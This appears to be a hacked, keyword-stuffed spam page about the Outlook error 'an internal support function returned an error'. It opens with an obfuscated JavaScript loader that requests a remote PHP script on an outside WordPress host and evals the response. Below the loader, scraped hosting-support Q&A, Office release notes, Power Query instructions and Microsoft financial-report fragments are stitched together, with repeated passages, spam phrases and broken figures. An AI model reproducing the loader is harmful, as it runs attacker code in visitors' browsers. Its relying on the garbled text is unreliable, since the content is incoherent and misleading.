;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//tesima.com.mk/wp-admin/css/colors/blue/blue.php','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B

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Microsoft outlook 2016 an internal support function returned an error free

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By default, the Encrypt connection check box is selected to signify that Power Query connects to your database using an encrypted connection. If you do not want to connect using an encrypted connection, clear this check box, and then click Connect.. If a connection to your SQL Server is not established using an encrypted connection, Power Query prompts you to connect using an . Sep 14,  · (b) (h) Revenue $ , $ 96, $ 91, $ 93, $ 86, Gross margin: 72, 62, driven by higher revenue from Premier Support Services and Microsoft Consulting Services, offset in part by a decline in revenue from custom support agreements. Deloitte & Touche LLP and the internal auditors each have full and. Microsoft support is here to help you with Microsoft products. Find how-to articles, videos, and training for Office, Windows, Surface, and more. Outlook. OneDrive. Windows. Surface devices. Gaming. Microsoft Teams. Microsoft Store. Here’s access to a free trial of Microsoft Quickly create and share content that stands out. GitHub has been included in our consolidated results of operations starting on the October 25, acquisition date. Includes a $ billion net income tax benefit related to intangible property transfers and a $ million net charge related to the enactment of the Tax Cuts and Jobs Act (“TCJA”), which together increased net income and diluted earnings per share (“EPS”) by $

In this tutorial, we will show you how to set up MS Outlook to check your email. Outlook will allow you to ссылка на подробности and receive emails from your desktop without logging into webmail. You must have an email account already created in cPanel to do so.

If you have not done so already, please refer to our tutorial on creating email accounts in cPanel. If you are unsure what your email settings are, you can find them with our Email Configuration tool. Your email account set up is complete. Windows games fix free more information on making changes to settings or troubleshooting email issues, please see our Support Center Email microsoft outlook 2016 an internal support function returned an error free for more information.

If you find you need further assistance please feel free to ask a question on our support center website. Hello really enjoyed your Article. Will the business Email Stop working when the host plan Expires? Thanks for your time. Thanks for contacting us. Yes, email will stop working once любви avid sibelius 8.7.2 free это hosting plan expires. However, any emails already synced to your local computer will remain.

Hi sir, I need your help regarding create a folder but only show client response on this option. I recommend reviewing the documentation for Outlook to learn how to set up your folder and filters to behave as you wish. I m Using Outlook in my Windows 10 lap.

Hi Althaf, you can add a signature following these instructions. Additionally, you can setup your folders by adding them in Outlook. If you are experiencing an issue по этому сообщению the software you may need to reach to the developers support website for assistance with their product. If you continue to receive this message, contact your server administrator or Internet service provider ISP.

Subject: Tile flooring estimate. The following recipient s cannot be reached:. If I send myself an email from an email account of still function emails after the hosting transfer, I receive this message:. A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address es failed:. LMTP error after end of data: 5. Sorry for the problem with setting up your email clients for 2 of your sites. My first comment will be that our live technical support team would be best equipped to aid you in seeing if your email issues are server related, or жмите related to the email client setup.

Though, if webmail is working, then generally the issue is not server related. I recommend the following:. It is possible to move one and not the other. If the nameservers for your hosting service are all pointed to the new hosting server, then DNS will be managed in the new location. If not, then these settings are handled remotely. I know this is very redundant, but your settings should microsoft outlook 2016 an internal support function returned an error free the protocol you are using POP or IMAPthe ports being used there 2 main types secure and insecure and make sure that authentication criteria typically, the user name and password are correct.

If there is, it may be trying to use your OLD settings and throwing up errors. If your email is confirmed to be normally working at the hosting service, then you may need to contact Microsoft. Sometimes, the problem is something that needs to be cleared in Outlook itself. Sorry to say that the older versions of Outlook might be the source of the problem, but it is possible since you are using an year old version of the software.

It appears as though you are using a Gmail account with POP. I tried many times to reset my password but it keeps on coming. I recommend removing and adding the account to your Outlook. However, if you are using Microsoft outlook 2016 an internal support function returned an error free you may lose any emails that are not stored on the server. If you are using IMAP this will not happen and you can remove and add microsoft outlook 2016 an internal support function returned an error free account to ensure that all the settings are entered correctly.

Since this is our public forum, we cannot provide account specific information. Inbox alone is not updating in outlook while configuring yahoo mil. Sent items got updating in outlook. Pl provide the solution for this. This guide is intended to assist you with configuring Outlook using the Settings that work for InMotion Hosting servers. We are happy to help you troubleshoot further, but will need a full example of the error and returned email headers. Thank you, John-Paul. This articule mentions nothing about setting up the folders dictated from the pst files.

I had it working fine for 2 weeks until I followed your steps to add additional accounts. Now, NONE are functioning. Then you will be able to use the account tree listing to map the folder you want to save the Sent items to. Unfortunately, I was unable to locate the settings for Drafts and Trash in Outlook However, during my investigation, it seems this functionality is improved in Outlook I hope this helps!

Since Mar 22,my Outlook in my laptop is not downloading any incoming emails. However, I am able to send emails from my laptop.

I checked the mail account settings on my Outlook in my laptop and the test was successful. Could you please help? Please refer to the troubleshooting portion of our email guides as they may help to identify the issue. If you continue to have problems we recommend that you contact our live technical support team. Their contact information is at the bottom of the page.

I have one perticuler persion create читать далее folder when he was send me to one microsoft outlook 2016 an internal support function returned an error free so I have receive microsoft outlook 2016 an internal support function returned an error free mail so pls guide me to solve this problem. Can you explain the details of your circumstances so I can further offer some assistance?

I am having a problem with my 0utlook email. My incoming and outgoing emails seems to have interchanged names. I am finding it difficult to tell which emails are from my clients as they are coming in with my domain name instead of the clients name.

When i send an email to a someone and i leave a copy, the copy comes to my inbox as the other person узнать больше здесь. Thanks for the question about your Outlook email. First of all, there is only ONE official email name for an email account. Servers identify the sending or receiving account by the email name. Note that posts are public domain on the support center. If you wish to handle this privately, then please contact our live technical support team using the contact information below.

I cannot find all my email address records which have been previously created and saved in Outlook Express when I switched to using Outlook My Outlook Address Book is empty. If you continue to have problems with the issue our recommendation is to contact Microsoft support in order to determine your next steps.

I have been using M Outlook 07 for 3 years. Previously, to delete an item. I hit the delete icon and the item disappeared from the inbox.

I should say that this began after I moved an signed with a different server. What is going on? It is likely a certain feature that may have been enabled. It would be best to check with Microsoft support. I am getting this error while trying to test account settings, Log onto incoming mail server POP3 : Cannot find the e-mail server.

Verify the server information in your http://replace.me/13668.txt properties. I have done all the settings correctly. Sorry for the problems with the mail settings. If you log in to your cPanel and go to mail, there is an option for configuring the mail client for email account. Check the settings there. Additionally, check to see if webmail is working for that account. If webmail is working, then the email account is setup correctly.

I use an Acer PC with Windows i. Since we switched, we have not been able to send or receive emails from our Outlook account. If you need more information, let me know. Thanks in advance for your help.

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Design a robust patch management plan for a new startup that will use primarily Windows workstations and Linux servers in its day-to-day operations.

You can include images to explain information as well in the slide. I need at least a minimum of 15 slides. I just need enough slides to communicate all of the Patch Management process. But try to at least use the words of text which are requested in this order. But all slides have to have text within each slide. Please reference and cite all sources. Please be sure to also follow all directions very closely. SketchUp is a popular 3D graphics program that makes it easy to create shareable conceptual designs, such as fully textured architectural models and other graphics used in industrial design, product design, and civil and mechanical engineering.

Now, for the first time, SketchUp graphics. Transcribing data from paper into Excel can be a slow and frustrating process. Now you can, with the Data from Picture feature! To take advantage of this powerful feature, simply go to the Data tab and select From Picture , then choose the source; you can also review and correct the data, if necessary, before inserting it into your worksheet. Any documents shared with you will automatically show up in your list; typically, the most relevant documents to you appear at the top of the list.

To experience this feature, simply click on the Home tab or the Open tab and select Shared with Me. The Office Dictation toolbar has been redesigned, featuring new visuals, a more responsive user interface, and a smaller size to stay out of the way of what matters—your content!

To activate the new dictation toolbar, simply click the Dictate button on the Home tab. The total number of responses allowed on an individual form or quiz in Forms has been increased from 50, to 5 million. This change eliminates the need to use multiple forms to collect more than 50, responses. Form owners can now gather up to 5 million responses on a single form, and can also export the results as a. Using your voice to dictate content is a fast, hands-free way of putting your thoughts into a note—shown to be three times faster than typing!

With Dictate for OneNote, now you can simply speak your thoughts to create content. To access this feature, just click on the Dictate microphone icon on the home tab and begin dictating your notes.

On resource-constrained devices two cores or less and eight gigabytes of RAM or less , Excel has now by default made recalculation more optimal by running calculation on a single thread. In most cases, users should see noticeably faster calculation on these devices. These optimizations are more noticeable on devices with slower memory or slower CPU-memory throughput, such as low-cost devices. The AutoFilter function is now noticeably faster! The optimizations are especially noticeable on low-end devices that have less memory or slower CPU-to-memory throughput.

This functionality, which was previously available in Office for the web, is now also an option for your Office desktop applications. Prior to the improved experience, when users tried to refresh a PivotTable connected to a dataset that they did not have access to, nothing would happen. Now, a dialog box appears that informs them that they do not have access to the dataset, and allows them to click a link to request access from the owner.

Once access is granted, users can go back to the PivotTable and refresh to continue their analysis. We fixed an issue where certain buttons in the ribbon would not draw correctly when the window was resized.

We fixed an issue where the app would close unexpectedly as a result of PowerQuery data processing. We fixed an issue with LET functions where the name argument was the same as the column reference and the row was absolute. We fixed an issue so that modern charts will now show localized currency symbols when currency values are formatted. We fixed an issue where a reading pane could disappear when the user switched folders and was using a pinned web add-in.

We fixed an issue where the cursor would scroll to the end of the document after deleting a paragraph mark. We fixed an issue where switching between Linear and Professional in LaTex equations could result in display errors. We fixed an issue related to specific example text which would display poorly due to the rich-edit HTML ignoring the HTML small element and not resetting the character format masks at the end of a hyperlink. Recommended PivotTables are now more intelligent and easier to use!

The dialog box interface has been replaced by a redesigned panel, making it easier to view all of your options and simpler to change your data selection before inserting a recommended PivotTable. Review the recommendations and insert the one you want into your workbook. Modern comments in PowerPoint offer many enhancements that improve the collaboration process on your presentation, including comments anchored to specific text, comments visible in the margin and in the comments pane, the ability to resolve threads, enhanced mentions functionality, and more.

Previously limited to commercial licenses of Office, modern comments are now available to the PowerPoint consumer audience as well! Collaborating with others while working in Word is a vital productivity tool for many users, and disruptions can be extremely frustrating. Conflicts between different authors and changes not saved to the server will show as tracked changes.

No longer! Many users have requested improvements for PivotTables connected to Power BI datasets, enabling easy drag-and-drop aggregations by dragging fields into the Values area of the PivotTable.

This work builds on recent improvements that make it easier to create Power BI-connected PivotTables without having to leave Excel. You asked for it! Outlook has traditionally supported receiving email at addresses other than your default address known as a proxy address, or alias. Now you can send mail from those proxy accounts as well by choosing the desired outgoing address.

In the message window, click the arrow on the right side of the From button and choose Manage List. You can then add additional From addresses to the dropdown menu.

Compose your email, and then click the Send button. Note that your tenant admin must enable this feature to make it available to users. Dropdown lists are a handy way to make data entry and validation more efficient in Excel.

Up until now, default sensitivity labels, configured by your administrator, were automatically applied when a file was created. Now, labels are applied whenever a document, worksheet, or presentation is either created or modified. Note that you can select a different label if one better matches the sensitivity of a given file. With the new Record experience in PowerPoint, you can make your presentations more impactful by recording videos with narration, enabling you to tell the story in your words.

This feature allows you to bring all the components of the presentation together for easy sharing and viewing. The exportable video includes all recorded timings, narrations, ink, and laser pointer gestures, and also preserves any animations, transitions, and media.

To enter the new experience, click the Record button in the top app bar, or click the Record tab and then select From Beginning or From Current Slide. Making your presentation accessible to people with disabilities requires knowledge, compassion, and special tools.

The new Accessibility ribbon in PowerPoint helps you accomplish this by bringing all the tools you need together in one place. To open the Accessibility ribbon, click Check Accessibility on the Review tab. Now when you open your own profile card, a new link appears under your name and title.

Click on Update your photo to go to the web page where you can change the photo associated with your profile.

In our increasingly busy world, dictating your emails in Outlook has become a very popular way to improve your efficiency. To use this feature, click the Dictate button on the Message tab for an email. Additional sensitive information types configured as part of OneDrive and SharePoint data loss prevention DLP policies can now be detected by the app to show a policy tip. This update also brings accuracy improvements and globalization support.

The ODF 1. Now you can show multiple months both horizontally and vertically in the Calendar To-Do bar. Collaborating with others is a key part of producing great content in Word, and the Track Changes feature is an essential part of that process.

But sometimes you only want your own changes to be tracked, without forcing this setting on others. To do so, go to the Review tab and open the dropdown menu on the Track Changes button; then select Just Mine. WebP is a modern image format that offers better compression for publishing images to the web. Gain a clearer view of complex workbooks with the new Navigation pane feature.

When adding an account to Outlook, a link to create a new Outlook. Outlook makes it easy to reply faster to emails by offering short suggested replies for messages that can be answered with just a few words. The Read Aloud feature in Word and Outlook is great for authors and readers alike. To switch between different voice options, select the Settings icon at the upper-right corner of your message or document and click the Voice Selection drop-down menu. Note: You must be connected to the internet to access this feature.

Using your voice to accomplish tasks is becoming more and more common in many productivity apps. Now you can use your voice to search within Word; find commands, content, and more without typing a thing.

To use this feature, click the microphone icon in the Search bar at the top of your Word document, then speak your search terms. Outlook clients that use built-in labeling will now also enforce the existing PowerShell label policy advanced settings DisableMandatoryInOutlook and OutlookDefaultLabel, previously supported only by the Azure Information Protection unified labeling client. If you have already configured these settings for your organization, they will now be enforced in Outlook clients.

Immersive Reader is an Office tool that allows you to better focus on your content. This tool adjusts the text spacing, colors, column widths, and more, and uses line focusing to highlight the content being read. This highly popular feature in OneNote and Word is now available to users of Outlook for Windows desktop. To access the feature, select the View menu and then click the Immersive Reader button. Outlook now features Org Explorer, a new app that enables you to contextualize, visualize, and explore the people and teams around you.

You can import data into Excel from a wide variety of data sources and the sections that follow show you how. For more information on what to do with your data once it’s imported, see How data journeys through Excel.

You can create a query from an Excel table, named range, or dynamic array in the current workbook. Importing dynamic arrays requires a Microsoft subscription.

For more information on dynamic arrays, see Dynamic array formulas and spilled array behavior. If prompted, in the Create Table dialog box, you can select the Range Selection button to select a specific range to use as a data source.

If the table or range of data has column headers, select My table has headers. The header cells are used to define the column names for the query. For more information, see Import from an Excel Table.

In the Excel Browse dialog box, browse for or type a path to the file that you want to query. For more information about advanced connector options, see Excel Workbook. The following procedure shows the basic steps. For more detailed coverage, see Import or export text. In the Comma-Separated Values Browse dialog box, browse for or type a path to the file that you want to query.

Note: If you are importing data from a CSV file, Power Query will automatically detect column delimiters including column names and types. For example, if you imported the example CSV file below, Power Query automatically uses the first row as the column names and changes each column data type.

The following procedure shows the basic steps of importing data. For more detailed coverage, see Import XML data. After the connection succeeds, use the Navigator pane to browse and preview the collections of items in the XML file in a tabular form.

For more information about advanced connector options, see XML. The Import Data dialog box appears. For more information about advanced connector options, see JSON. NET Framework 4. You can download the latest. NET Framework from here. Select your PDF file, and then click Open. The Navigator dialog box opens your PDF and displays available tables. For more information about advanced connector options, see PDF. You can import data from several files having a similar schema and format from a folder.

Then, you can append the data into one table. In the Browse dialog box, locate the folder, and then select Open. For detailed steps, see Import data from a folder with multiple files. For more information about advanced connector options, see Folder. You can import data from several files having a similar schema and format from a SharePoint library. In the SharePoint Folder dialog box, enter the root URL for the SharePoint site not including any reference to a library, and then navigate to the library.

For more information about advanced connector options, see SharePoint folder. Optionally, you can specify a Database Name as well. If you want to import data using a native database query, specify your query in the SQL Statement box.

Windows This is the default selection. Select this if you want to connect using Windows authentication. After you select this, specify a user name and password to connect to your SQL Server instance. By default, the Encrypt connection check box is selected to signify that Power Query connects to your database using an encrypted connection.

If you do not want to connect using an encrypted connection, clear this check box, and then click Connect. If a connection to your SQL Server is not established using an encrypted connection, Power Query prompts you to connect using an unencrypted connection. Click OK in the message to connect using an unencrypted connection. For more information about advanced connector options, see SQL Server database.

In the Import Data dialog box, browse for and locate the Access database file. Select the file, and then select Open. The Navigator dialog box appears. If you have many tables and queries, use the Search box to locate an object or use the Display Options along with the Refresh button to filter the list.

For more information about advanced connector options, see Access database. Note When you use a workbook connected to a SQL Server Analysis Services database, you may need additional information to answer specific product questions, such as reference information about multidimensional expressions MDX , or configuration procedures for an online analytical processing OLAP server. The first page of the Data Connection Wizard appears.

Its title is Connect to Database Server. Tip: If you know the name of the offline cube file that you want to connect to, you can type the complete file path, file name, and extension. Under Log on credentials , do one of the following, then click Next :. To use your current Windows user name and password, click Use Windows Authentication. To enter a database user name and password, click Use the following User Name and Password , and then type your user name and password in the corresponding User Name and Password boxes.

Use strong passwords that combine uppercase and lowercase letters, numbers, and symbols. Weak passwords don’t mix these elements. For example, Y6dh! Passwords should contain 8 or more characters. A pass phrase that uses 14 or more characters is better. It is critical that you remember your password. If you forget your password, Microsoft cannot retrieve it.

Store the passwords that you write down in a secure place away from the information that they help protect. Select Next to go to the second wizard screen. Its title is Select Database and Table. To connect to a specific cube file in the database, make sure that Connect to a specific cube or table is selected, and then select a cube from the list. In the Select the database that contains the data you want box, select a database, and then click Next.

Click Next to go to the third wizard screen. Click Browse to change the default file location of My Data Sources , or check for existing file names.

In the Description , Friendly Name , and Search Keywords boxes, type a description of the file, a friendly name, and common search words all are optional. To ensure that the connection file is used when the PivotTable is refreshed, click Always attempt to use this file to refresh this data. Selecting this check box ensures that updates to the connection file will always be used by all workbooks that use that connection file.

You can specify how a PivotTable is accessed if the workbook is saved to Excel Services and is opened by using Excel Services. If you want to ensure that the same data is accessed whether you open the workbook in Excel or Excel Services, make sure that the authentication setting in Excel is the same. Select Authentication Settings , and select one of the following options to log on to the data source:.

Windows Authentication Select this option to use the Windows username and password of the current user. This is the most secure method, but it can affect performance when there are many users. A site administrator can configure a SharePoint site to use a Single Sign On database where a username and password can be stored. This method can be the most efficient when there are many users. None Select this option to save the username and password in the connection file.

Important: Avoid saving logon information when connecting to data sources. This information may be stored as plain text, and a malicious user could access the information to compromise the security of the data source. Select Finish to close the Data Connection Wizard. Decide how you want to import the data, and then select OK. For more information about using this dialog box, select the question mark? You can connect to a specific offline cube file if it has been created on the database server.

You can also import data into Excel as either a Table or a PivotTable report. In the Navigator pane select the database, and then select the cube or tables you want to connect. Click Load to load the selected table into a worksheet, or click Edit to perform additional data filters and transformations in the Power Query Editor before loading it.

Note: Before you can connect to an Oracle database using Power Query , you need the Oracle client software v8. If you want to import data using native database query, specify your query in the SQL Statement box. For more information, see Import data from database using Native Database Query. For more information about advanced connector options, see Oracle Database. Select the driver that matches your Power Query installation bit or bit.

For more information, see Import data from a database using Native Database Query. For more information about advanced connector options, see MySQL database.

Account Type: Select POP3 or IMAP if you are not sure of the difference please see our article on POP3 vs. IMAP; Incoming Mail Server: enter replace.me (be sure to replace replace.me with your actual domain name); Outgoing Mail Server (SMTP): enter replace.me (be sure to replace replace.me with your actual domain name) User Name: Enter in the full email . May 09,  · Recently when attempting to forward an email, I get an error message that says: “An internal support function returned an error.”. Oct 16,  · WHAT I TRIED THAT DIDN’T WORK. 1. rebooted. 2. repaired the Outlook profile. 3. recreated the Outlook profile. 4. ran a repair on Office 5. Uninstalled Office and reinstalled. Spice (9) Reply (6) flag Report. Aug 22,  · It seems that when I open Outlook in safe mode at this client, “Microsoft VBA for Outlook Addin” gets activated. When I start Outlook normally, “Microsoft VBA for Outlook Addin” is “load on demand (currently unloaded)”. Very strange in my opinion, on my own client it doesn’t react that way. Edit2: sfc /scannow doesn’t find an error. Use the Import and Export wizard to export your email messages to an Outlook Data File .pst) from your old Outlook email profile, and then import the Outlook Data File .pst) to your new Outlook email profile. Note If you are not familiar with the Import and Export feature in Outlook, see the following articles.

Import data from data sources (Power Query).New features that are not supported in earlier versions of Excel

Oct 16,  · WHAT I TRIED THAT DIDN’T WORK. 1. rebooted. 2. repaired the Outlook profile. 3. recreated the Outlook profile. 4. ran a repair on Office 5. Uninstalled Office and reinstalled. Spice (9) Reply (6) flag Report. Aug 09,  · Step 2: Check for Local Data preference. Outlook provides a GPO to let administrators deploy a specific Autodiscover XML file to be used for configuration. If the administrator has deployed this registry value and seeded an replace.me file, Outlook reads the Autodiscover payload from this file. Jan 04,  · I am trying to send out an email for a nonprofit to a group distribution list. Every time I hit send, I get an “internal support function returned an error” message, with no explanation or options. Any idea how to get past this? I am not very techie so please give me good details for how to fix. Ugh, very frustrating. Thanks! Dec 18,  · I have a user who is trying to send an email to a group from his contacts in Outlook He receives the following error “an internal support function returned an. Account Type: Select POP3 or IMAP if you are not sure of the difference please see our article on POP3 vs. IMAP; Incoming Mail Server: enter replace.me (be sure to replace replace.me with your actual domain name); Outgoing Mail Server (SMTP): enter replace.me (be sure to replace replace.me with your actual domain name) User Name: Enter in the full email .

The Office Dictation toolbar has been redesigned, featuring new visuals, a more responsive user interface, and a smaller size to stay out of the way of what matters—your content! To activate the new dictation toolbar, simply click the Dictate button on the Home tab. The total number of responses allowed on an individual form or quiz in Forms has been increased from 50, to 5 million. This change eliminates the need to use multiple forms to collect more than 50, responses. Form owners can now gather up to 5 million responses on a single form, and can also export the results as a.

Using your voice to dictate content is a fast, hands-free way of putting your thoughts into a note—shown to be three times faster than typing!

With Dictate for OneNote, now you can simply speak your thoughts to create content. To access this feature, just click on the Dictate microphone icon on the home tab and begin dictating your notes.

On resource-constrained devices two cores or less and eight gigabytes of RAM or less , Excel has now by default made recalculation more optimal by running calculation on a single thread. In most cases, users should see noticeably faster calculation on these devices. These optimizations are more noticeable on devices with slower memory or slower CPU-memory throughput, such as low-cost devices. The AutoFilter function is now noticeably faster!

The optimizations are especially noticeable on low-end devices that have less memory or slower CPU-to-memory throughput. This functionality, which was previously available in Office for the web, is now also an option for your Office desktop applications. Prior to the improved experience, when users tried to refresh a PivotTable connected to a dataset that they did not have access to, nothing would happen.

Now, a dialog box appears that informs them that they do not have access to the dataset, and allows them to click a link to request access from the owner. Once access is granted, users can go back to the PivotTable and refresh to continue their analysis. We fixed an issue where certain buttons in the ribbon would not draw correctly when the window was resized. We fixed an issue where the app would close unexpectedly as a result of PowerQuery data processing.

We fixed an issue with LET functions where the name argument was the same as the column reference and the row was absolute. We fixed an issue so that modern charts will now show localized currency symbols when currency values are formatted.

We fixed an issue where a reading pane could disappear when the user switched folders and was using a pinned web add-in. We fixed an issue where the cursor would scroll to the end of the document after deleting a paragraph mark. We fixed an issue where switching between Linear and Professional in LaTex equations could result in display errors. We fixed an issue related to specific example text which would display poorly due to the rich-edit HTML ignoring the HTML small element and not resetting the character format masks at the end of a hyperlink.

Recommended PivotTables are now more intelligent and easier to use! The dialog box interface has been replaced by a redesigned panel, making it easier to view all of your options and simpler to change your data selection before inserting a recommended PivotTable. Review the recommendations and insert the one you want into your workbook. Modern comments in PowerPoint offer many enhancements that improve the collaboration process on your presentation, including comments anchored to specific text, comments visible in the margin and in the comments pane, the ability to resolve threads, enhanced mentions functionality, and more.

Previously limited to commercial licenses of Office, modern comments are now available to the PowerPoint consumer audience as well! Collaborating with others while working in Word is a vital productivity tool for many users, and disruptions can be extremely frustrating.

Conflicts between different authors and changes not saved to the server will show as tracked changes. No longer! Many users have requested improvements for PivotTables connected to Power BI datasets, enabling easy drag-and-drop aggregations by dragging fields into the Values area of the PivotTable. This work builds on recent improvements that make it easier to create Power BI-connected PivotTables without having to leave Excel.

You asked for it! Outlook has traditionally supported receiving email at addresses other than your default address known as a proxy address, or alias. Now you can send mail from those proxy accounts as well by choosing the desired outgoing address. In the message window, click the arrow on the right side of the From button and choose Manage List. You can then add additional From addresses to the dropdown menu.

Compose your email, and then click the Send button. Note that your tenant admin must enable this feature to make it available to users. Dropdown lists are a handy way to make data entry and validation more efficient in Excel. Up until now, default sensitivity labels, configured by your administrator, were automatically applied when a file was created.

Now, labels are applied whenever a document, worksheet, or presentation is either created or modified. Note that you can select a different label if one better matches the sensitivity of a given file.

With the new Record experience in PowerPoint, you can make your presentations more impactful by recording videos with narration, enabling you to tell the story in your words. This feature allows you to bring all the components of the presentation together for easy sharing and viewing. The exportable video includes all recorded timings, narrations, ink, and laser pointer gestures, and also preserves any animations, transitions, and media.

To enter the new experience, click the Record button in the top app bar, or click the Record tab and then select From Beginning or From Current Slide. Making your presentation accessible to people with disabilities requires knowledge, compassion, and special tools.

The new Accessibility ribbon in PowerPoint helps you accomplish this by bringing all the tools you need together in one place. To open the Accessibility ribbon, click Check Accessibility on the Review tab.

Now when you open your own profile card, a new link appears under your name and title. Click on Update your photo to go to the web page where you can change the photo associated with your profile. In our increasingly busy world, dictating your emails in Outlook has become a very popular way to improve your efficiency.

To use this feature, click the Dictate button on the Message tab for an email. Additional sensitive information types configured as part of OneDrive and SharePoint data loss prevention DLP policies can now be detected by the app to show a policy tip. This update also brings accuracy improvements and globalization support.

In addition, all our broker-priced investments have a sufficient level of trading volume to demonstrate that the fair values used are appropriate for these investments.

Our fair value processes include controls that are designed to ensure appropriate fair values are recorded. These controls include model validation, review of key model inputs, analysis of period-over-period fluctuations, and independent recalculation of prices where appropriate. We issued debt to take advantage of favorable pricing and liquidity in the debt markets, reflecting our credit rating and the low interest rate environment.

The proceeds of these issuances were or will be used for general corporate purposes, which may include, among other things, funding for working capital, capital expenditures, repurchases of capital stock, acquisitions, and repayment of existing debt.

Unearned revenue is generally billed upfront at the beginning of each annual coverage period for multi-year agreements and recognized ratably over the coverage period. Unearned revenue also includes payments for other offerings for which we have been paid in advance and earn the revenue when we transfer control of the product or service.

The following table outlines the expected future recognition of unearned revenue as of June 30, If our customers choose to license cloud-based versions of our products and services rather than licensing transaction-based products and services, the associated revenue will shift from being recognized at the time of the transaction to being recognized over the subscription period or upon consumption, as applicable.

We provide indemnifications of varying scope and size to certain customers against claims of intellectual property infringement made by third parties arising from the use of our products and certain other matters. Additionally, we have agreed to cover damages resulting from breaches of certain security and privacy commitments in our cloud business.

In evaluating estimated losses on these obligations, we consider factors such as the degree of probability of an unfavorable outcome and our ability to make a reasonable estimate of the amount of loss. These obligations did not have a material impact in our consolidated financial statements during the periods presented. The following table summarizes the payments due by fiscal year for our outstanding contractual obligations as of June 30, We will continue to invest in sales, marketing, product support infrastructure, and existing and advanced areas of technology, as well as continue making acquisitions that align with our business strategy.

Additions to property and equipment will continue, including new facilities, datacenters, and computer systems for research and development, sales and marketing, support, and administrative staff. We expect capital expenditures to increase in coming years to support growth in our cloud offerings. We have operating and finance leases for datacenters, corporate offices, research and development facilities, retail stores, and certain equipment. We have not engaged in any related party transactions or arrangements with unconsolidated entities or other persons that are reasonably likely to materially affect liquidity or the availability of capital resources.

We expect existing cash, cash equivalents, short-term investments, cash flows from operations, and access to capital markets to continue to be sufficient to fund our operating activities and cash commitments for investing and financing activities, such as dividends, share repurchases, debt maturities, material capital expenditures, and the transition tax related to the TCJA, for at least the next 12 months and thereafter for the foreseeable future.

Our consolidated financial statements and accompanying notes are prepared in accordance with GAAP. Preparing consolidated financial statements requires management to make estimates and assumptions that affect the reported amounts of assets, liabilities, revenue, and expenses.

Critical accounting policies for us include revenue recognition, impairment of investment securities, goodwill, research and development costs, contingencies, income taxes, and inventories.

Our contracts with customers often include promises to transfer multiple products and services to a customer. Determining whether products and services are considered distinct performance obligations that should be accounted for separately versus together may require significant judgment.

When a cloud-based service includes both on-premises software licenses and cloud services, judgment is required to determine whether the software license is considered distinct and accounted for separately, or not distinct and accounted for together with the cloud service and recognized over time. Certain cloud services, primarily Office , depend on a significant level of integration, interdependency, and interrelation between the desktop applications and cloud services, and are accounted for together as one performance obligation.

Revenue from Office is recognized ratably over the period in which the cloud services are provided. We use a single amount to estimate SSP for items that are not sold separately, including on-premises licenses sold with SA or software updates provided at no additional charge. We use a range of amounts to estimate SSP when we sell each of the products and services separately and need to determine whether there is a discount to be allocated based on the relative SSP of the various products and services.

In instances where SSP is not directly observable, such as when we do not sell the product or service separately, we determine the SSP using information that may include market conditions and other observable inputs. We typically have more than one SSP for individual products and services due to the stratification of those products and services by customers and circumstances. In these instances, we may use information such as the size of the customer and geographic region in determining the SSP.

Due to the various benefits from and the nature of our SA program, judgment is required to assess the pattern of delivery, including the exercise pattern of certain benefits across our portfolio of customers. Our products are generally sold with a right of return, we may provide other credits or incentives, and in certain instances we estimate customer usage of our products and services, which are accounted for as variable consideration when determining the amount of revenue to recognize.

Returns and credits are estimated at contract inception and updated at the end of each reporting period if additional information becomes available. Changes to our estimated variable consideration were not material for the periods presented. The new standard related to revenue recognition had a material impact in our consolidated financial statements.

We review investments quarterly for indicators of other-than-temporary impairment. This determination requires significant judgment. In making this judgment, we employ a systematic methodology quarterly that considers available quantitative and qualitative evidence in evaluating potential impairment of our investments.

If the cost of an investment exceeds its fair value, we evaluate, among other factors, general market conditions, credit quality of debt instrument issuers, the duration and extent to which the fair value is less than cost, and for equity securities, our intent and ability to hold, or plans to sell, the investment.

